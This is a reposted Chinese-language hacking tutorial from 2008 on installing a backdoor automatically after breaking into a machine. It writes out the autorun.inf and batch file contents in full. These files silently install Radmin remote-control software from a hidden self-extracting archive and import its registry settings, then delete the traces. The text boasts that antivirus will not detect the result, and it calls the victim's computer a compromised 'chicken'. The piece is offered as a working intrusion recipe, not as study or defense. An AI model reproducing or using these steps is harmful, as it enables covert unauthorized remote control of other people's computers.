黑客技巧之入侵网站后全自动安装后门

2008-02-23 07:06:58来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

这里只需要你有上传的权限。

一共三个文件:1.Autorun.inf、2.Shell.bat、3.Hao.exe(自解压文件)。

思路:

全部放在C盘下。当肉鸡主人双击C盘时自动运行第一文件,第一文件带动运行第二文件,同时第二运行第三运行完可正常进入C盘。不会让人发觉。并且里面所带的批处理,会在最后把所有文件删除。此时,后门却已经装上去了(此法针对没有权限运行木马的入侵活动)。

制作:

[autorun] open=shell.bat,这个是autorun.inf @echo off hao.exe c:\windows\explorer c:\ del autorun.inf del rad.exe del shell.ba,这个是shell.bat hao.exe,里面包含admdll.dll、raddrv.dll、admin.reg、pchealthy.exe、r.bat五个文件(关键所在)r.bat——批处理做法 @echo off @pchealthy.exe /install /silence @regedit /s admin.reg @net start r_server @del admin.reg @del r.bat,其他四个就是Radmin的文件。这个大家都会,复制过来就行。

我们再来看自解压的处理。在解压路径里我们用 %systemroot%\system32,就是解压到系统目录里,并且“解压后运行”填上我们的r.bat文件。因为这里的文件比较多,比较隐蔽。解压模式我们选 “全部隐藏”,和 “覆盖所有文件”! 好了,一个不被杀毒软件所能查杀的好后门程序就成功制作出来了!

大家不要放在文件夹里压缩哦,要直接选上admdll.dll、raddrv.dll、admin.reg、pchealthy.exe、r.bat五个文件压缩,这样就行啦。

关键词:
【推荐给好友】【关闭】
最新五条评论
查看全部评论
评论总数 0 条
您的评论
用户名: 新注册) 密 码: 匿名:
·用户发表意见仅代表其个人意见,并且承担一切因发表内容引起的纠纷和责任
·本站管理人员有权在不通知用户的情况下删除不符合规定的评论信息或留做证据
·请客观的评价您所看到的资讯,提倡就事论事,杜绝漫骂和人身攻击等不文明行为

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:系统安全技巧之把自己的文件隐藏起来

下一篇:恶意网页病毒症状分析及简单修复方法